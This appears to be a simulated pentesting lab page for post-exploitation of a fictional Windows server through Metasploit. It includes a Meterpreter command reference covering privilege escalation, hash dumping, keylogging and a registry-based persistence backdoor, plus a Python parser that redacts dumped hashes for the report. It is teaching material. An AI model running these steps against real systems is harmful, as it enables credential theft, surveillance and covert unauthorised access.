=[ metasploit v6.4.18-dev ]
+ -- --=[ 2371 exploits - 1228 auxiliary - 412 post ]
+ -- --=[ 1390 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
METERPRETER
CYBERSEC LAB — VIRTUAL PENETRATION TESTING
MODULE 11 — POST-EXPLOITATION
SCREENSHOT RESULT — screenshot.png (captured from Meterpreter session 1)

The capture shows an open Excel window, "Apex Systems — Q4 Financial Summary.xlsx", marked CONFIDENTIAL — DO NOT DISTRIBUTE, with the following cells visible:
Q4 Revenue: $4,218,400
Net Income: $2,114,200
Admin Pwd: ApexAdmin@2024!

⚠ Desktop screenshot captured — sensitive data visible: ApexAdmin@2024! found in open spreadsheet

🔴 ASSIGNMENT GOALS

Launch msfconsole and interact with the existing Meterpreter session.
Enumerate the target with sysinfo, getuid, and ps.
Escalate privileges to SYSTEM using getsystem.
Dump password hashes using hashdump.
Capture a screenshot and run the keylogger.
Establish persistence on the target.
Complete the pentest report and submit.
PHASE 1 — SESSION INTERACTION
📋 BRIEFING
⚠ CLASSIFIED — RED TEAM OPERATION

MISSION BRIEFING

Operation: Ghost Shell  |  Tool: Metasploit / Meterpreter
SCENARIO
Initial access to an Apex Systems Windows Server 2019 machine has been established via an unpatched vulnerability (MS17-010 EternalBlue). A Meterpreter session is waiting for you.

Your objective is to perform thorough post-exploitation — enumerate the system, escalate privileges to SYSTEM, dump password hashes, collect evidence via screenshot and keylogger, and establish persistence for continued access.

Document all findings in the pentest report.
OBJECTIVES
1. Run msfconsole, list sessions, interact with session 1.
2. Run sysinfo, getuid, getpid, and ps to enumerate the target.
3. Run getsystem to escalate from svcweb to NT AUTHORITY\SYSTEM.
4. Run hashdump to extract local account password hashes.
5. Run screenshot and keyscan_start + keyscan_dump to collect evidence.
6. Run the persistence module to establish a registry-based backdoor.
7. Fill out the Pentest Report and submit.
TOOLS
Terminal — msfconsole, meterpreter commands, post modules
Reference Manual — Meterpreter command reference and post module guide
Pentest Report — Document and submit your post-exploitation findings
TARGET
apex-srv-02 — 192.168.1.100 — Windows Server 2019 — Session 1 ready
TERMINAL — root@kali / msfconsole
Metasploit Lab Terminal — Kali Linux 2024.1
Type 'msfconsole' to launch Metasploit Framework.
REFERENCE MANUAL — METERPRETER
METASPLOIT CONSOLE
msfconsole — launch MSF
sessions — list active sessions
sessions -i 1 — interact with session 1
sessions -l — list all sessions
background — background current session
SYSTEM ENUMERATION
sysinfo — OS, hostname, arch
getuid — current user
getpid — current process ID
ps — list running processes
ipconfig — network interfaces
arp — ARP cache
route — routing table
env — environment variables
PRIVILEGE ESCALATION
getsystem — auto privesc to SYSTEM
getsystem -t 1 — named pipe impersonation
getsystem -t 3 — token duplication
getuid — verify new privilege level
CREDENTIAL DUMPING
hashdump — dump SAM hashes (needs SYSTEM)
run post/windows/gather/credentials/credential_collector
run post/multi/recon/local_exploit_suggester
EVIDENCE COLLECTION
screenshot — capture desktop screenshot
keyscan_start — start keylogger
keyscan_dump — dump captured keystrokes
keyscan_stop — stop keylogger
download <file> — download file from target
upload <file> — upload file to target
PERSISTENCE
# Two available modules (both work):
run post/windows/manage/persistence
run post/windows/manage/persistence_exe

# Options:
STARTUP=REGISTRY — registry run key (default)
STARTUP=SCHEDULER — scheduled task
STARTUP=STARTUPFOLDER — startup folder
SESSION=1

run persistence -h — see all options
PIVOTING & RECON
run post/multi/manage/shell_to_meterpreter
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_shares
run post/windows/gather/enum_applications
run post/multi/recon/local_exploit_suggester
HASH FORMAT
Hashdump output format:
username:RID:LM_hash:NTLM_hash:::

NTLM hashes can be cracked with Hashcat (mode 1000) or used directly in Pass-the-Hash attacks.
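The following parser for the hashdump line format above is an added example for this lab page; it is not Metasploit's code and was not part of the original material. It turns captured lines into structured rows for Section 3 of the report, redacts the hash values so the report does not reproduce them, and flags the findings a reviewer looks for: accounts still storing a real LM hash (anything other than the well-known value aad3b435b51404eeaad3b435b51404ee, which means LM storage is disabled), accounts with the empty-password NT hash 31d6cfe0d16ae931b73c59d7e0c089c0, and two accounts sharing one NT hash (password reuse). The sample lines are constructed with fake RIDs and hash values.

```python
"""Parse Meterpreter hashdump output into structured findings for a report.

Added example for this lab page; not Metasploit code. The SAMPLE block below
is constructed (fake RIDs and hash values), not real credentials.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Public, well-known values meaning "no LM hash stored" and "empty password".
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# hashdump line layout from the reference section: username:RID:LM_hash:NTLM_hash:::
HASHDUMP_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def lm_stored(self) -> bool:
        """True when a real LM hash is present, i.e. LM storage is still enabled."""
        return self.lm != EMPTY_LM

    @property
    def empty_password(self) -> bool:
        return self.nt == EMPTY_NT

    @property
    def well_known(self) -> str:
        """Name the built-in RIDs so the report identifies them even if renamed."""
        return {500: "built-in Administrator", 501: "built-in Guest"}.get(self.rid, "")


def parse_hashdump(text: str) -> List[Account]:
    """Return one Account per well-formed line; banners and noise are skipped."""
    accounts = []
    for line in text.splitlines():
        m = HASHDUMP_LINE.match(line.strip())
        if m:
            accounts.append(Account(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return accounts


def reused_hashes(accounts: List[Account]) -> Dict[str, List[str]]:
    """Group users sharing one NT hash: the same password on several accounts."""
    groups: Dict[str, List[str]] = {}
    for a in accounts:
        groups.setdefault(a.nt, []).append(a.user)
    return {h: users for h, users in groups.items() if len(users) > 1}


def redact(h: str, keep: int = 4) -> str:
    """Keep a short prefix so the report can reference a hash without reproducing it."""
    return h[:keep] + "*" * (len(h) - keep)


def report_rows(accounts: List[Account]) -> List[dict]:
    """Rows for Section 3 of the report: one per account, hashes redacted, weaknesses flagged."""
    return [
        {
            "user": a.user,
            "rid": a.rid,
            "note": a.well_known,
            "lm_stored": a.lm_stored,
            "empty_password": a.empty_password,
            "nt": redact(a.nt),
        }
        for a in accounts
    ]


# Constructed sample in hashdump format (fake values; the last line is deliberate noise).
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svcweb:1001:1234567890abcdef1234567890abcdef:fedcba9876543210fedcba9876543210:::
backup:1002:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
[*] this is not a hashdump line
"""

if __name__ == "__main__":
    accts = parse_hashdump(SAMPLE)
    for row in report_rows(accts):
        print(row)
    print("shared NT hashes:", reused_hashes(accts))
```

On the constructed sample the parser yields four accounts, flags svcweb as the only one with an LM hash still stored, Guest as having an empty password, and reports Administrator and backup as sharing one NT hash, which is the kind of finding Section 5 of the report should rate rather than the raw hash values themselves.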
PENTEST REPORT — POST-EXPLOITATION FINDINGS

APEX SYSTEMS INC. — RED TEAM ENGAGEMENT — COMPLETE ALL FIELDS

SECTION 1 — TARGET SYSTEM
SECTION 2 — PRIVILEGE ESCALATION
SECTION 3 — CREDENTIAL DUMPING
SECTION 4 — PERSISTENCE & EVIDENCE
SECTION 5 — RISK ASSESSMENT